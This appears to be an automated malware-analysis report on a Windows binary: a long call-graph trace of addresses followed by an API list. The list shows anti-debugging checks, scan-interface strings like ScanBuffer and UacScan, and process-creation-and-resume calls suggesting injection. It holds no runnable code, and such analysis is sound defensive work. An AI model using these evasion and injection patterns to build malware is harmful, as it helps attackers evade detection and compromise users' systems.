call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e72c 1187->1539 1225->116 1229 28725ce-2872e78 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857a80 call 286ea4c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286da20 call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854734 call 286e4c0 call 28557c4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854500 * 13 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285494c call 28546a4 call 2857e34 1225->1229 1226->1225 1781 2872e7d-2872e7f 1229->1781 1661 28723a6-28723b3 1539->1661 1662 2871911-2871988 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 1539->1662 1661->1056 1661->1539 1690 287198d-2871a1a call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e8ec 1662->1690 1690->1661 1724 2871a20-2871b13 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 1690->1724 1780 2871b18-2871b3b CoInitialize call 285480c 1724->1780 1785 2871b40-2871b8a call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 1780->1785 1783 2872e85-2873016 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285494c call 28546a4 call 2857fc8 1781->1783 1784 287301b-2873126 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 1781->1784 1783->1784 1871 287312d-2873345 call 28549ac call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854898 1784->1871 1872 2873128-287312b 1784->1872 1815 2871b8f-2871b96 call 286881c 1785->1815 1821 2871b9b-2871c12 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 1815->1821 1863 2871c17-2871c22 call 2866d48 1821->1863 1869 2871c27-2871ca2 call 2862818 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 1863->1869 1912 2871ca7-2871cae call 286881c 1869->1912 2012 28750ac-28758fe call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e60c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857a80 call 286ea4c call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e974 call 286e9e8 call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854898 1871->2012 2013 287334b-287378d call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857e10 1871->2013 1872->1871 1917 2871cb3-2871d2a call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 1912->1917 1949 2871d2f-2871d47 call 285e37c 1917->1949 1952 2871d4c-2871dba call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 1949->1952 1976 2871dbf-2871dc6 call 286881c 1952->1976 1981 2871dcb-2871e42 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 1976->1981 2008 2871e47-2871e53 call 285e37c 1981->2008 2014 2871e58-2871ec6 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 2008->2014 2659 2875904-2875949 call 285480c call 285494c call 28546a4 call 2857e10 2012->2659 2660 28770ec-2877367 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854898 2012->2660 2377 287378f-28737e5 call 286e5cc call 2854d8c call 2854734 call 2854d8c call 286df00 2013->2377 2378 28737ea-2873e99 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 2854798 call 285494c call 2867b90 call 2868798 call 285480c call 285494c call 2854798 call 285494c call 2867b90 call 2868798 call 2868704 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857e10 2013->2378 2049 2871ecb-2871ed2 call 286881c 2014->2049 2055 2871ed7-2871f4e call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 2049->2055 2097 2871f53-2871f64 call 285e37c 2055->2097 2103 2871f69-2871fe7 call 2861768 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 2097->2103 2145 2871fec-2871ff3 call 286881c 2103->2145 2151 2871ff8-2872063 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 2145->2151 2186 2872068-2872095 call 286881c CoUninitialize call 285480c 2151->2186 2199 287209a-2872184 call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 2186->2199 2279 2872186-2872189 2199->2279 2280 287218b-2872190 2199->2280 2279->2280 2280->1661 2283 2872196-28723a1 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286ef70 call 2854500 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 2280->2283 2283->1661 2377->2378 2905 2873ee1-28740a8 call 2868704 call 286e974 call 2854798 call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 2857e10 2378->2905 2906 2873e9b-2873edc call 2854d8c * 2 call 2854734 call 286df00 2378->2906 2659->2660 2686 287594f-2876065 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854d8c * 2 call 2854734 call 286df00 2659->2686 2880 287736d-28779bf call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854798 call 285494c call 2868408 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285494c call 28546a4 call 286ac30 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28536a0 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 2660->2880 2881 2877e9c-287809b call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854898 2660->2881 3580 287606a-2876269 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854898 2686->3580 3848 28779c6-2877c88 call 2865a6c call 2854b78 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28549a4 call 2867dd0 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286af50 2880->3848 3849 28779c1-28779c4 2880->3849 3123 2878f25-28790a8 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854898 2881->3123 3124 28780a1-2878274 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854798 call 285494c call 2854d20 call 2854d9c CreateProcessAsUserW 2881->3124 3145 2874105-2874533 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 286e974 call 2854798 call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857e10 2905->3145 3146 28740aa-2874100 call 286e5cc call 2854d8c call 2854734 call 2854d8c call 286df00 2905->3146 2906->2905 3358 2879854-287ae59 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c * 16 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 28546a4 * 2 call 286881c call 2867b90 call 2868184 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c ExitProcess 3123->3358 3359 28790ae-28790bd call 2854898 3123->3359 3397 2878276-28782ed call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 3124->3397 3398 28782f2-28783fd call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 3124->3398 3876 2874535-2874576 call 2854d8c * 2 call 2854734 call 286df00 3145->3876 3877 287457b-28749c4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 2857e10 3145->3877 3146->3145 3359->3358 3377 28790c3-2879396 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286e974 call 285480c call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2857e10 3359->3377 3879 287964e-287984f call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28549a4 call 2868ba8 3377->3879 3880 287939c-2879649 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854d8c * 2 call 2854734 call 286df00 3377->3880 3397->3398 3584 2878404-2878724 call 28549a4 call 286e0c4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 286cf9c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 3398->3584 3585 28783ff-2878402 3398->3585 3950 287626f-28764c8 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 2854d20 call 2854d8c call 2854734 call 286df00 3580->3950 3951 28764cd-2876bf0 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 28536a0 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 2852f08 call 2857944 call 2854798 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2852f08 call 2857944 call 2854798 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 28536d0 3580->3951 4211 2878726-2878738 call 286857c 3584->4211 4212 287873d-2878f20 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c ResumeThread call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c CloseHandle call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2867ecc call 2868798 * 6 CloseHandle call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c 3584->4212 3585->3584 4488 2877c8d-2877ca4 call 28536d0 3848->4488 3849->3848 3876->3877 4675 28749c6-2874a1c call 286e5cc call 2854d8c call 2854734 call 2854d8c call 286df00 3877->4675 4676 2874a21-2874c7a call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 285480c call 285494c call 28546a4 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 2857e10 3877->4676 3879->3358 3880->3879 3950->3951 4211->4212 4212->3123 4675->4676 4958 2874cd7-28750a7 call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2868704 call 285494c call 2868408 Sleep call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 285480c call 285494c call 28546a4 call 2854798 call 285494c call 28546a4 call 286881c call 2854d20 call 286de78 call 2854d20 call 286de78 call 285480c call 285494c * 2 MoveFileA call 285480c call 285494c * 2 MoveFileA call 285494c call 2854d20 call 286de78 call 285494c call 2854d20 call 286de78 call 285494c call 2854d20 call 286de78 4676->4958 4959 2874c7c-2874cd2 call 286e5cc call 2854d8c call 2854734 call 2854d8c call 286df00 4676->4959 4958->2012 4959->4958
                      APIs
                      • InetIsOffline.URL(00000000,00000000,0287B3D5,?,?,?,000002F7,00000000,00000000), ref: 0286F0E2
                        • Part of subcall function 0286881C: LoadLibraryA.KERNEL32(00000000,00000000,02868903), ref: 02868850
                        • Part of subcall function 0286881C: GetModuleHandleA.KERNEL32(00000000,00000000,00000000,02868903), ref: 02868860
                        • Part of subcall function 0286881C: GetProcAddress.KERNEL32(74B20000,00000000), ref: 02868879
                        • Part of subcall function 0286881C: FreeLibrary.KERNEL32(74B20000,00000000,028B2388,Function_000065D8,00000004,028B2398,028B2388,000186A3,00000040,028B239C,74B20000,00000000,00000000,00000000,00000000,02868903), ref: 028688E3
                        • Part of subcall function 0286EFC8: GetModuleHandleW.KERNEL32(KernelBase,?,0286F3CC,UacInitialize,028B237C,0287B40C,UacScan,028B237C,0287B40C,ScanBuffer,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanString), ref: 0286EFCE
                        • Part of subcall function 0286EFC8: GetProcAddress.KERNEL32(00000000,IsDebuggerPresent), ref: 0286EFE0
                        • Part of subcall function 0286F024: GetModuleHandleW.KERNEL32(KernelBase), ref: 0286F034
                        • Part of subcall function 0286F024: GetProcAddress.KERNEL32(00000000,CheckRemoteDebuggerPresent), ref: 0286F046
                        • Part of subcall function 0286F024: CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 0286F05D
                        • Part of subcall function 02857E10: GetFileAttributesA.KERNEL32(00000000,?,0286FD00,ScanString,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanString,028B237C,0287B40C,UacScan,028B237C,0287B40C,UacInitialize), ref: 02857E1B
                        • Part of subcall function 0285C2E4: GetModuleFileNameA.KERNEL32(00000000,?,00000105,029A68C8,?,02870032,ScanBuffer,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanBuffer,028B237C,0287B40C,OpenSession), ref: 0285C2FB
                        • Part of subcall function 0286DFE4: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286E0B4), ref: 0286E01F
                        • Part of subcall function 0286DFE4: NtOpenFile.N(?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000,0286E0B4), ref: 0286E04F
                        • Part of subcall function 0286DFE4: NtQueryInformationFile.N(?,?,?,00000018,00000005,?,00100001,?,?,00000001,00000020,00000000,?,00000000,00000000,00000000), ref: 0286E064
                        • Part of subcall function 0286DFE4: NtReadFile.N(?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?,00100001), ref: 0286E090
                        • Part of subcall function 0286DFE4: NtClose.N(?,?,00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,?,00000018,00000005,?), ref: 0286E099
                        • Part of subcall function 02857E34: GetFileAttributesA.KERNEL32(00000000,?,02872E7D,ScanString,028B237C,0287B40C,OpenSession,028B237C,0287B40C,ScanBuffer,028B237C,0287B40C,OpenSession,028B237C,0287B40C,Initialize), ref: 02857E3F
                        • Part of subcall function 02857FC8: CreateDirectoryA.KERNEL32(00000000,00000000,?,0287301B,OpenSession,028B237C,0287B40C,ScanString,028B237C,0287B40C,Initialize,028B237C,0287B40C,ScanString,028B237C,0287B40C), ref: 02857FD5
                        • Part of subcall function 0286DF00: RtlDosPathNameToNtPathName_U.N(00000000,?,00000000,00000000,00000000,0286DFD2), ref: 0286DF3F
                        • Part of subcall function 0286DF00: NtCreateFile.N(?,00100002,?,?,00000000,00000000,00000001,00000002,00000020,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0286DF79
